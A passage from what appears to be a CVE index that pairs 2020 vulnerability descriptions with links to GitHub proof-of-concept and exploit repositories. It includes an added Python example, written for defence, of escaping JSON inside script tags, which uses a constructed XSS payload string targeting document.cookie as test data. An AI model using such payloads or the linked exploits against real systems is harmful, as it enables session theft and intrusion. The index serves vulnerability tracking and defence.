- [chef-cft/salt-vulnerabilities](https://github.com/chef-cft/salt-vulnerabilities)
- [rossengeorgiev/salt-security-backports](https://github.com/rossengeorgiev/salt-security-backports)
- [dozernz/cve-2020-11651](https://github.com/dozernz/cve-2020-11651)
- [0xc0d/CVE-2020-11651](https://github.com/0xc0d/CVE-2020-11651)
- [jasperla/CVE-2020-11651-poc](https://github.com/jasperla/CVE-2020-11651-poc)
- [bravery9/SaltStack-Exp](https://github.com/bravery9/SaltStack-Exp)
- [kevthehermit/CVE-2020-11651](https://github.com/kevthehermit/CVE-2020-11651)
- [lovelyjuice/cve-2020-11651-exp-plus](https://github.com/lovelyjuice/cve-2020-11651-exp-plus)
- [ssrsec/CVE-2020-11651-CVE-2020-11652-EXP](https://github.com/ssrsec/CVE-2020-11651-CVE-2020-11652-EXP)
- [RakhithJK/CVE-2020-11651](https://github.com/RakhithJK/CVE-2020-11651)
- [appcheck-ng/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652](https://github.com/appcheck-ng/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652)
- [hardsoftsecurity/CVE-2020-11651-PoC](https://github.com/hardsoftsecurity/CVE-2020-11651-PoC)

### CVE-2020-11652 (2020-04-30)

An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.

- [fanjq99/CVE-2020-11652](https://github.com/fanjq99/CVE-2020-11652)
- [Al1ex/CVE-2020-11652](https://github.com/Al1ex/CVE-2020-11652)
- [limon768/CVE-2020-11652-POC](https://github.com/limon768/CVE-2020-11652-POC)

### CVE-2020-11738 (2020-04-13)

The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.

- [raghu66669999/wordpress-snapcreek](https://github.com/raghu66669999/wordpress-snapcreek)

### CVE-2020-11794
- [w4cky/CVE-2020-11794](https://github.com/w4cky/CVE-2020-11794)

### CVE-2020-11819 (2020-04-16)

In Rukovoditel 2.5.2, an attacker may inject an arbitrary .php file location instead of a language file and thus achieve command execution.

- [danyx07/PoC-RCE-Rukovoditel](https://github.com/danyx07/PoC-RCE-Rukovoditel)

### CVE-2020-11851 (2020-11-17)

Arbitrary code execution vulnerability in the Micro Focus ArcSight Logger product, affecting all versions prior to 7.1.1. The vulnerability could be remotely exploited, resulting in the execution of arbitrary code.

- [ch1nghz/CVE-2020-11851](https://github.com/ch1nghz/CVE-2020-11851)

### CVE-2020-11881 (2020-09-14)

An array index error in MikroTik RouterOS 6.41.3 through 6.46.5, and 7.x through 7.0 Beta5, allows an unauthenticated remote attacker to crash the SMB server via modified setup-request packets, aka SUP-12964.

- [botlabsDev/CVE-2020-11881](https://github.com/botlabsDev/CVE-2020-11881)

### CVE-2020-11883 (2020-04-17)

In Divante vue-storefront-api through 1.11.1 and storefront-api through 1.0-rc.1, as used in VueStorefront PWA, unexpected HTTP requests lead to an exception that discloses the error stack trace, with absolute file paths and Node.js module names.

- [0ndras3k/CVE-2020-11883](https://github.com/0ndras3k/CVE-2020-11883)

### CVE-2020-11890 (2020-04-21)

An issue was discovered in Joomla! before 3.9.17. Improper input validation in the usergroup table class could lead to a broken ACL configuration.

- [HoangKien1020/CVE-2020-11890](https://github.com/HoangKien1020/CVE-2020-11890)

### CVE-2020-11896 (2020-06-17)

The Treck TCP/IP stack before 6.0.1.66 allows Remote Code Execution, related to IPv4 tunneling.

- [Fans0n-Fan/Treck20-Related](https://github.com/Fans0n-Fan/Treck20-Related)
- [0xkol/ripple20-digi-connect-exploit](https://github.com/0xkol/ripple20-digi-connect-exploit)

### CVE-2020-11898 (2020-06-17)

The Treck TCP/IP stack before 6.0.1.66 improperly handles an IPv4/ICMPv4 Length Parameter Inconsistency, which might allow remote attackers to trigger an information leak.

- [scamwork/POC_CVE-2020-11898](https://github.com/scamwork/POC_CVE-2020-11898)

### CVE-2020-11932 (2020-05-13)

It was discovered that the Subiquity installer for Ubuntu Server logged the LUKS full disk encryption password if one was entered.

- [ProjectorBUg/CVE-2020-11932](https://github.com/ProjectorBUg/CVE-2020-11932)
- [Staubgeborener/CVE-2020-11932](https://github.com/Staubgeborener/CVE-2020-11932)
- [code-developers/CVE-2020-11932](https://github.com/code-developers/CVE-2020-11932)

### CVE-2020-11975 (2020-06-05)

Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process.

- [1135/unomi_exploit](https://github.com/1135/unomi_exploit)

### CVE-2020-11978 (2020-07-16)

An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.

- [pberba/CVE-2020-11978](https://github.com/pberba/CVE-2020-11978)

### CVE-2020-11989 (2020-06-22)

In Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.

- [HYWZ36/HYWZ36-CVE-2020-11989-code](https://github.com/HYWZ36/HYWZ36-CVE-2020-11989-code)

### CVE-2020-11990 (2020-12-01)

We have resolved a security issue in the camera plugin that could have affected certain Cordova (Android) applications. An attacker who could install (or lead the victim to install) a specially crafted (or malicious) Android application would be able to access pictures taken with the app externally.

- [forse01/CVE-2020-11990-Cordova](https://github.com/forse01/CVE-2020-11990-Cordova)

### CVE-2020-11996 (2020-06-26)

A specially crafted sequence of HTTP/2 requests sent to Apache Tomcat 10.0.0-M1 to 10.0.0-M5, 9.0.0.M1 to 9.0.35 and 8.5.0 to 8.5.55 could trigger high CPU usage for several seconds. If a sufficient number of such requests were made on concurrent HTTP/2 connections, the server could become unresponsive.

- [rusakovichma/tomcat-embed-core-9.0.31-CVE-2020-11996](https://github.com/rusakovichma/tomcat-embed-core-9.0.31-CVE-2020-11996)

### CVE-2020-12077 (2020-04-23)

The mappress-google-maps-for-wordpress plugin before 2.53.9 for WordPress does not correctly implement AJAX functions with nonces (or capability checks), leading to remote code execution.

- [RandomRobbieBF/CVE-2020-12077](https://github.com/RandomRobbieBF/CVE-2020-12077)

### CVE-2020-12078 (2020-04-28)

An issue was discovered in Open-AudIT 3.3.1. There is shell metacharacter injection via attributes to an open-audit/configuration/ URI. An attacker can exploit this by adding an excluded IP address to the global discovery settings (internally called exclude_ip). This exclude_ip value is passed to the exec function in the discoveries_helper.php file (inside the all_ip_list function) without being filtered, which means that the attacker can provide a payload instead of a valid IP address.

- [mhaskar/CVE-2020-12078](https://github.com/mhaskar/CVE-2020-12078)
- [84KaliPleXon3/CVE-2020-12078](https://github.com/84KaliPleXon3/CVE-2020-12078)

### CVE-2020-12112 (2020-04-23)

BigBlueButton before 2.2.5 allows remote attackers to obtain sensitive files via Local File Inclusion.

- [tchenu/CVE-2020-12112](https://github.com/tchenu/CVE-2020-12112)

### CVE-2020-12116 (2020-05-07)

Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.

- [BeetleChunks/CVE-2020-12116](https://github.com/BeetleChunks/CVE-2020-12116)

### CVE-2020-12124 (2020-10-02)

A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication.

- [db44k/CVE-2020-12124](https://github.com/db44k/CVE-2020-12124)
- [Scorpion-Security-Labs/CVE-2020-12124](https://github.com/Scorpion-Security-Labs/CVE-2020-12124)

### CVE-2020-12255 (2020-05-18)

rConfig 3.9.4 is vulnerable to remote code execution due to improper validation in the file upload functionality. vendor.crud.php accepts a file upload by checking content-type without considering the file extension and header. Thus, an attacker can exploit this by uploading a .php file to vendor.php that contains arbitrary PHP code and changing the content-type to image/gif.

- [vishwaraj101/CVE-2020-12255](https://github.com/vishwaraj101/CVE-2020-12255)

### CVE-2020-12351 (2020-11-23)

Improper input validation in BlueZ may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.

- [naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP](https://github.com/naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP)

### CVE-2020-12432 (2020-07-21)

The WOPI API integration for Vereign Collabora CODE through 4.2.2 does not properly restrict delivery of JavaScript to a victim's browser, and lacks proper MIME type access control, which could lead to XSS that steals account credentials via cookies or local storage. The attacker must first obtain an API access token, which can be accomplished if the attacker is able to upload a .docx or .odt file. The associated API endpoints for exploitation are /wopi/files and /wopi/getAccessToken.

- [d7x/CVE-2020-12432](https://github.com/d7x/CVE-2020-12432)

### CVE-2020-12593 (2020-11-18)

Symantec Endpoint Detection & Response, prior to 4.5, may be susceptible to an information disclosure issue, which is a type of vulnerability that could potentially allow unauthorized access to data.

- [nasbench/CVE-2020-12593](https://github.com/nasbench/CVE-2020-12593)

### CVE-2020-12625 (2020-05-04)

An issue was discovered in Roundcube Webmail before 1.4.4. There is a cross-site scripting (XSS) vulnerability in rcube_washtml.php because JavaScript code can occur in the CDATA of an HTML message.

- [mbadanoiu/CVE-2020-12625](https://github.com/mbadanoiu/CVE-2020-12625)

### CVE-2020-12629 (2020-05-04)

include/class.sla.php in osTicket before 1.14.2 allows XSS via the SLA Name.

- [mkelepce/CVE-2020-12629](https://github.com/mkelepce/CVE-2020-12629)

### CVE-2020-12640 (2020-05-04)

Roundcube Webmail before 1.4.4 allows attackers to include local files and execute code via directory traversal in a plugin name to rcube_plugin_api.php.

- [mbadanoiu/CVE-2020-12640](https://github.com/mbadanoiu/CVE-2020-12640)

### CVE-2020-12641 (2020-05-04)

rcube_image.php in Roundcube Webmail before 1.4.4 allows attackers to execute arbitrary code via shell metacharacters in a configuration setting for im_convert_path or im_identify_path.

- [mbadanoiu/CVE-2020-12641](https://github.com/mbadanoiu/CVE-2020-12641)
- [mbadanoiu/MAL-004](https://github.com/mbadanoiu/MAL-004)

### CVE-2020-12688
- [TheCyberGeek/Centreon-20.04](https://github.com/TheCyberGeek/Centreon-20.04)

### CVE-2020-12695 (2020-06-08)

The Open Connectivity Foundation UPnP specification before 2020-04-17 does not forbid the acceptance of a subscription request with a delivery URL on a different network segment than the fully qualified event-subscription URL, aka the CallStranger issue.

- [yunuscadirci/CallStranger](https://github.com/yunuscadirci/CallStranger)
- [corelight/callstranger-detector](https://github.com/corelight/callstranger-detector)

### CVE-2020-12696 (2020-05-07)

The iframe plugin before 4.5 for WordPress does not sanitize a URL.

- [g-rubert/CVE-2020-12696](https://github.com/g-rubert/CVE-2020-12696)

### CVE-2020-12702 (2021-02-24)

Weak encryption in the Quick Pairing mode in the eWeLink mobile application (Android application V4.9.2 and earlier, iOS application V4.9.1 and earlier) allows physically proximate attackers to eavesdrop on Wi-Fi credentials and other sensitive information by monitoring the Wi-Fi spectrum during the pairing process.

- [salgio/ESPTouchCatcher](https://github.com/salgio/ESPTouchCatcher)
- [salgio/eWeLink-QR-Code](https://github.com/salgio/eWeLink-QR-Code)

### CVE-2020-12712 (2020-06-11)

A vulnerability based on insecure user/password encryption in the JOE (job editor) component of SOS JobScheduler 1.12 and 1.13 allows attackers to decrypt the user/password that is optionally stored with a user's profile.

- [SanderUbink/CVE-2020-12712](https://github.com/SanderUbink/CVE-2020-12712)

### CVE-2020-12717 (2020-05-14)

The COVIDSafe (Australia) app 1.0 and 1.1 for iOS allows a remote attacker to crash the app, and consequently interfere with COVID-19 contact tracing, via a Bluetooth advertisement containing manufacturer data that is too short. This occurs because of an erroneous OpenTrace manuData.subdata call. The ABTraceTogether (Alberta), ProteGO (Poland), and TraceTogether (Singapore) apps were also affected.

- [wabzqem/covidsafe-CVE-2020-12717-exploit](https://github.com/wabzqem/covidsafe-CVE-2020-12717-exploit)

### CVE-2020-12753 (2020-05-11)

An issue was discovered on LG mobile devices with Android OS 7.2, 8.0, 8.1, 9, and 10 software. Arbitrary code execution can occur via the bootloader because of an EL1/EL3 coldboot vulnerability involving raw_resources. The LG ID is LVE-SMP-200006 (May 2020).

- [shinyquagsire23/CVE-2020-12753-PoC](https://github.com/shinyquagsire23/CVE-2020-12753-PoC)

### CVE-2020-12800 (2020-06-08)

The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.

- [amartinsec/CVE-2020-12800](https://github.com/amartinsec/CVE-2020-12800)

### CVE-2020-12828 (2020-05-21)

An issue was discovered in AnchorFree VPN SDK before 1.3.3.218. The VPN SDK service takes certain executable locations over a socket bound to localhost. Binding to the socket and providing a path where a malicious executable file resides leads to executing the malicious executable file with SYSTEM privileges.

- [0xsha/ZombieVPN](https://github.com/0xsha/ZombieVPN)

### CVE-2020-12856 (2020-05-18)

OpenTrace, as used in COVIDSafe through v1.0.17, TraceTogether, ABTraceTogether, and other applications on iOS and Android, allows remote attackers to conduct long-term re-identification attacks and possibly have unspecified other impact, because of how Bluetooth is used.

- [alwentiu/COVIDSafe-CVE-2020-12856](https://github.com/alwentiu/COVIDSafe-CVE-2020-12856)

### CVE-2020-12928 (2020-10-13)

A vulnerability in a dynamically loaded AMD driver in AMD Ryzen Master V15 may allow any authenticated user to escalate privileges to NT authority system.

- [ekknod/AmdRyzenMasterCheat](https://github.com/ekknod/AmdRyzenMasterCheat)

### CVE-2020-13094 (2020-05-18)

Dolibarr before 11.0.4 allows XSS.

- [mkelepce/CVE-2020-13094](https://github.com/mkelepce/CVE-2020-13094)

### CVE-2020-13151 (2020-08-05)

Aerospike Community Edition 4.9.0.5 allows for unauthenticated submission and execution of user-defined functions (UDFs), written in Lua, as part of a database query. It attempts to restrict code execution by disabling os.execute() calls, but this is insufficient. Anyone with network access can use a crafted UDF to execute arbitrary OS commands on all nodes of the cluster at the permission level of the user running the Aerospike service.

- [b4ny4n/CVE-2020-13151](https://github.com/b4ny4n/CVE-2020-13151)

### CVE-2020-13158 (2020-06-22)

Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter.

- [InfoSec4Fun/CVE-2020-13158](https://github.com/InfoSec4Fun/CVE-2020-13158)

### CVE-2020-13159 (2020-06-22)

Artica Proxy before 4.30.000000 Community Edition allows OS command injection via the Netbios name, Server domain name, dhclient_mac, Hostname, or Alias field. NOTE: this may overlap CVE-2020-10818.

- [InfoSec4Fun/CVE-2020-13159](https://github.com/InfoSec4Fun/CVE-2020-13159)

### CVE-2020-13162 (2020-06-16)

A time-of-check time-of-use vulnerability in PulseSecureService.exe in Pulse Secure Client versions prior to 9.1.6 down to 5.3 R70 for Windows (which runs as NT AUTHORITY/SYSTEM) allows unprivileged users to run a Microsoft Installer executable with elevated privileges.

- [redtimmy/tu-TOCTOU-kaiu-TOCMEU-CVE-2020-13162-](https://github.com/redtimmy/tu-TOCTOU-kaiu-TOCMEU-CVE-2020-13162-)

### CVE-2020-13254 (2020-06-03)

An issue was discovered in Django 2.2 before 2.2.13 and 3.0 before 3.0.7. In cases where a memcached backend does not perform key validation, passing malformed cache keys could result in a key collision, and potential data leakage.

- [danpalmer/django-cve-2020-13254](https://github.com/danpalmer/django-cve-2020-13254)

### CVE-2020-13259 (2020-09-16)

A vulnerability in the web-based management interface of RAD SecFlow-1v os-image SF_0290_2.3.01.26 could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protections for the web UI on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. This could be exploited in conjunction with CVE-2020-13260.

- [UrielYochpaz/CVE-2020-13259](https://github.com/UrielYochpaz/CVE-2020-13259)

### CVE-2020-13277 (2020-06-19)

An authorization issue in the mirroring logic allowed read access to private repositories in GitLab CE/EE 10.6 and later through 13.0.5.

- [EXP-Docs/CVE-2020-13277](https://github.com/EXP-Docs/CVE-2020-13277)

### CVE-2020-13401 (2020-06-02)

An issue was discovered in Docker Engine before 19.03.11. An attacker in a container, with the CAP_NET_RAW capability, can craft IPv6 router advertisements, and consequently spoof external IPv6 hosts, obtain sensitive information, or cause a denial of service.

- [arax-zaeimi/Docker-Container-CVE-2020-13401](https://github.com/arax-zaeimi/Docker-Container-CVE-2020-13401)

### CVE-2020-13405 (2020-07-16)

userfiles/modules/users/controller/controller.php in Microweber before 1.1.20 allows an unauthenticated user to disclose the users database via a /modules/ POST request.

- [mrnazu/CVE-2020-13405](https://github.com/mrnazu/CVE-2020-13405)

### CVE-2020-13424 (2020-05-23)

The XCloner component before 3.5.4 for Joomla! allows Authenticated Local File Disclosure.

- [mkelepce/CVE-2020-13424](https://github.com/mkelepce/CVE-2020-13424)

### CVE-2020-13457
- [alt3kx/CVE-2020-13457](https://github.com/alt3kx/CVE-2020-13457)

### CVE-2020-13519 (2020-12-18)

A privilege escalation vulnerability exists in the WinRing0x64 Driver IRP 0x9c402088 functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause increased privileges. An attacker can send a malicious IRP to trigger this vulnerability.

- [SpiralBL0CK/poc-for-CVE-2020-13519-still-under-construction-](https://github.com/SpiralBL0CK/poc-for-CVE-2020-13519-still-under-construction-)

### CVE-2020-13640 (2020-06-18)

A SQL injection issue in the gVectors wpDiscuz plugin 5.3.5 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the order parameter of a wpdLoadMoreComments request. (No 7.x versions are affected.)

- [asterite3/CVE-2020-13640](https://github.com/asterite3/CVE-2020-13640)

### CVE-2020-13699 (2020-07-29)

TeamViewer Desktop for Windows before 15.8.3 does not properly quote its custom URI handlers. A malicious website could launch TeamViewer with arbitrary parameters, as demonstrated by a teamviewer10: --play URL. An attacker could force a victim to send an NTLM authentication request and either relay the request or capture the hash for offline password cracking. This affects teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. The issue is fixed in 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.

- [Dilshan-Eranda/CVE-2020-13699](https://github.com/Dilshan-Eranda/CVE-2020-13699)

### CVE-2020-13777 (2020-06-04)

GnuTLS 3.6.x before 3.6.14 uses incorrect cryptography for encrypting a session ticket (a loss of confidentiality in TLS 1.2, and an authentication bypass in TLS 1.3). The earliest affected version is 3.6.4 (2018-09-24) because of an error in a 2018-09-18 commit. Until the first key rotation, the TLS server always uses wrong data in place of an encryption key derived from an application.

- [0xxon/cve-2020-13777](https://github.com/0xxon/cve-2020-13777)
- [shigeki/challenge_CVE-2020-13777](https://github.com/shigeki/challenge_CVE-2020-13777)
- [prprhyt/PoC_TLS1_3_CVE-2020-13777](https://github.com/prprhyt/PoC_TLS1_3_CVE-2020-13777)

### CVE-2020-13851 (2020-06-11)

Artica Pandora FMS 7.44 allows remote command execution via the events feature.

- [hadrian3689/pandorafms_7.44](https://github.com/hadrian3689/pandorafms_7.44)

### CVE-2020-13884 (2020-06-08)

Citrix Workspace App before 1912 on Windows has Insecure Permissions and an Unquoted Path vulnerability which allows local users to gain privileges during the uninstallation of the application.

- [hessandrew/CVE-2020-13884](https://github.com/hessandrew/CVE-2020-13884)

### CVE-2020-13885 (2020-06-08)

Citrix Workspace App before 1912 on Windows has Insecure Permissions which allows local users to gain privileges during the uninstallation of the application.

- [hessandrew/CVE-2020-13885](https://github.com/hessandrew/CVE-2020-13885)

### CVE-2020-13886 (2020-11-26)

Intelbras TIP 200 60.61.75.15, TIP 200 LITE 60.61.75.15, and TIP 300 65.61.75.22 devices allow cgi-bin/cgiServer.exx?page=../ Directory Traversal.

- [Ls4ss/CVE-2020-13886](https://github.com/Ls4ss/CVE-2020-13886)

### CVE-2020-13889 (2020-06-06)

showAlert() in the administration panel in Bludit 3.12.0 allows XSS.

- [gh0st56/CVE-2020-13889](https://github.com/gh0st56/CVE-2020-13889)

### CVE-2020-13925 (2020-07-14)

Similar to CVE-2020-1956, Kylin has one more RESTful API which concatenates the API inputs into OS commands and then executes them on the server; the reported API lacks the necessary input validation, which allows attackers to execute OS commands remotely. Users of all previous versions after 2.3 should upgrade to 3.1.0.

- [bit4woo/CVE-2020-13925](https://github.com/bit4woo/CVE-2020-13925)

### CVE-2020-13933 (2020-08-17)

In Apache Shiro before 1.6.0, a specially crafted HTTP request may cause an authentication bypass.

- [EXP-Docs/CVE-2020-13933](https://github.com/EXP-Docs/CVE-2020-13933)
- [0xkami/cve-2020-13933](https://github.com/0xkami/cve-2020-13933)
- [KingBangQ/CVE-2020-13933Project](https://github.com/KingBangQ/CVE-2020-13933Project)

### CVE-2020-13935 (2020-07-14)

The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with invalid payload lengths could lead to a denial of service.

- [RedTeamPentesting/CVE-2020-13935](https://github.com/RedTeamPentesting/CVE-2020-13935)
- [aabbcc19191/CVE-2020-13935](https://github.com/aabbcc19191/CVE-2020-13935)

### CVE-2020-13937 (2020-10-19)

Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one RESTful API which exposes Kylin's configuration information without any authentication; this is dangerous because some confidential configuration entries are disclosed to everyone.

- [yaunsky/CVE-2020-13937](https://github.com/yaunsky/CVE-2020-13937)
- [Al1ex/CVE-2020-13937](https://github.com/Al1ex/CVE-2020-13937)
- [kailing0220/CVE-2020-13937](https://github.com/kailing0220/CVE-2020-13937)

### CVE-2020-13942 (2020-11-24)

It is possible to inject malicious OGNL or MVEL scripts into the /context.json public endpoint. This was partially fixed in 1.5.1 but a new attack vector was found. In Apache Unomi version 1.5.2 scripts are now completely filtered from the input. It is highly recommended to upgrade to the latest available version of the 1.5.x release to fix this problem.

- [lp008/CVE-2020-13942](https://github.com/lp008/CVE-2020-13942)
- [eugenebmx/CVE-2020-13942](https://github.com/eugenebmx/CVE-2020-13942)
- [shifa123/CVE-2020-13942-POC-](https://github.com/shifa123/CVE-2020-13942-POC-)
- [blackmarketer/CVE-2020-13942](https://github.com/blackmarketer/CVE-2020-13942)
- [yaunsky/Unomi-CVE-2020-13942](https://github.com/yaunsky/Unomi-CVE-2020-13942)
- [hoanx4/apche_unomi_rce](https://github.com/hoanx4/apche_unomi_rce)
- [Prodrious/CVE-2020-13942](https://github.com/Prodrious/CVE-2020-13942)

### CVE-2020-13945 (2020-12-07)

In Apache APISIX, if the user has enabled the Admin API and deleted the Admin API access IP restriction rules, the default token can be used to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5.

- [YutuSec/Apisix_Crack](https://github.com/YutuSec/Apisix_Crack)
- [K3ysTr0K3R/CVE-2020-13945-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2020-13945-EXPLOIT)
- [x0root/CVE-2020-13945-EXPLOIT](https://github.com/x0root/CVE-2020-13945-EXPLOIT)

### CVE-2020-13957 (2020-10-13)

Apache Solr versions 6.6.0 to 6.6.6, 7.0.0 to 7.7.3 and 8.0.0 to 8.6.2 prevent some features considered dangerous (which could be used for remote code execution) from being configured in a ConfigSet that's uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions.

- [s-index/CVE-2020-13957](https://github.com/s-index/CVE-2020-13957)

### CVE-2020-13958 (2020-11-17)

A vulnerability in Apache OpenOffice scripting events allows an attacker to construct documents containing hyperlinks pointing to an executable on the target user's file system. These hyperlinks can be triggered unconditionally. In fixed versions no internal protocol may be called from the document event handler, and other hyperlinks require a control-click.

- [Grey-Junior/CVE-2020-13958](https://github.com/Grey-Junior/CVE-2020-13958)

### CVE-2020-13965 (2020-06-09)

An issue was discovered in Roundcube Webmail before 1.3.12 and 1.4.x before 1.4.5. There is XSS via a malicious XML attachment because text/xml is among the allowed types for a preview.

- [mbadanoiu/CVE-2020-13965](https://github.com/mbadanoiu/CVE-2020-13965)

### CVE-2020-13973 (2020-06-09)

OWASP json-sanitizer before 1.2.1 allows XSS. An attacker who controls a substring of the input JSON, and controls another substring adjacent to a SCRIPT element in which the output is embedded as JavaScript, may be able to confuse the HTML parser as to where the SCRIPT element ends, and cause non-script content to be interpreted as JavaScript.

- [epicosy/json-sanitizer](https://github.com/epicosy/json-sanitizer)
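The failure mode described above is a context mismatch: the HTML parser locates the end of a `<script>` element by scanning for `</script`, and it knows nothing about JSON string quoting, so an attacker-controlled substring can end the element early. The following is an added example, not code from OWASP json-sanitizer or from the linked repository, showing the escaping a server should apply before placing JSON inside a script element and a check that mimics the HTML parser's scan. The payloads are constructed for illustration.

```python
"""Embedding JSON inside <script> without letting attacker-controlled strings
terminate the element.

Added example (standard library only), not code from OWASP json-sanitizer.
The hostile payloads are constructed for illustration.
"""
import json

# Characters that matter to the HTML parser or the JavaScript tokenizer but
# never need to appear literally in JSON output. Escaping them as \uXXXX keeps
# the value identical after JSON.parse() on the client.
_SCRIPT_SAFE = {
    "<": "\\u003c",
    ">": "\\u003e",
    "&": "\\u0026",
    "\u2028": "\\u2028",  # LINE SEPARATOR: legal in JSON, a line break in JS source
    "\u2029": "\\u2029",  # PARAGRAPH SEPARATOR
}


def json_for_script(value) -> str:
    """Serialize *value* so the result can be placed inside <script>...</script>.

    json.dumps() alone leaves '<' and '/' untouched, so a string such as
    "</script><script>..." would end the element early when the HTML parser
    scans for the closing tag; the parser does not understand JSON quoting.
    """
    text = json.dumps(value, ensure_ascii=False)
    for ch, esc in _SCRIPT_SAFE.items():
        text = text.replace(ch, esc)
    return text


def roundtrip(value):
    """What the client sees after JSON.parse(); the escapes are transparent."""
    return json.loads(json_for_script(value))


def render_page(payload) -> str:
    """Build the HTML fragment the server would emit."""
    return "<script>var config = %s;</script>" % json_for_script(payload)


def first_script_end(html: str) -> int:
    """Offset at which an HTML parser would end the <script> element.

    Script data ends at the first case-insensitive "</script" sequence; JSON
    quoting is irrelevant to this scan. Returns -1 if there is none.
    """
    return html.lower().find("</script")


if __name__ == "__main__":
    # Constructed attacker-controlled substring, as in the CVE description.
    hostile = {"name": "</script><script>alert(document.cookie)//"}
    naive = "<script>var config = %s;</script>" % json.dumps(hostile)
    safe = render_page(hostile)
    print(naive)
    print(safe)
    print("naive element ends at", first_script_end(naive),
          "| safe element ends at", first_script_end(safe))
```

The naive rendering closes the script element inside the JSON string literal; the escaped rendering only closes it at the server's own `</script>`, while `roundtrip` shows the client still receives the original string.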

### CVE-2020-13995 (2020-09-25)

U.S. Air Force Sensor Data Management System extract75 has a buffer overflow that leads to code execution. An overflow in a global variable (sBuffer) leads to a Write-What-Where outcome. Writing beyond sBuffer will clobber most global variables until reaching a pointer such as DES_info or image_info. By controlling that pointer, one achieves an arbitrary write when its fields are assigned. The data written is from a potentially untrusted NITF file in the form of an integer. The attacker can gain control of the instruction pointer.

- [dbrumley/extract75-cve-2020-13995](https://github.com/dbrumley/extract75-cve-2020-13995)

### CVE-2020-13996 (2020-06-09)

The J2Store plugin before 3.3.13 for Joomla! allows a SQL injection attack by a trusted store manager.

- [mkelepce/CVE-2020-13996](https://github.com/mkelepce/CVE-2020-13996)

### CVE-2020-14064 (2020-07-15)

IceWarp Email Server 12.3.0.1 has Incorrect Access Control for user accounts.

- [networksecure/CVE-2020-14064](https://github.com/networksecure/CVE-2020-14064)

### CVE-2020-14065 (2020-07-15)

IceWarp Email Server 12.3.0.1 allows remote attackers to upload files and consume disk space.

- [networksecure/CVE-2020-14065](https://github.com/networksecure/CVE-2020-14065)
- [pinpinsec/CVE-2020-14065](https://github.com/pinpinsec/CVE-2020-14065)

### CVE-2020-14066 (2020-07-15)

IceWarp Email Server 12.3.0.1 allows remote attackers to upload JavaScript files that are dangerous for clients to access.

- [networksecure/CVE-2020-14066](https://github.com/networksecure/CVE-2020-14066)
- [pinpinsec/CVE-2020-14066](https://github.com/pinpinsec/CVE-2020-14066)

### CVE-2020-14144 (2020-10-16)

The git hook feature in Gitea 1.1.0 through 1.12.5 might allow for authenticated remote code execution in customer environments where the documentation was not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a very limited subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides."

- [p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce](https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce)

### CVE-2020-14179 (2020-09-21)

Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1.

- [c0brabaghdad1/CVE-2020-14179](https://github.com/c0brabaghdad1/CVE-2020-14179)
- [mrnazu/CVE-2020-14179](https://github.com/mrnazu/CVE-2020-14179)
- [0x0060/CVE-2020-14179](https://github.com/0x0060/CVE-2020-14179)

### CVE-2020-14181 (2020-09-17)

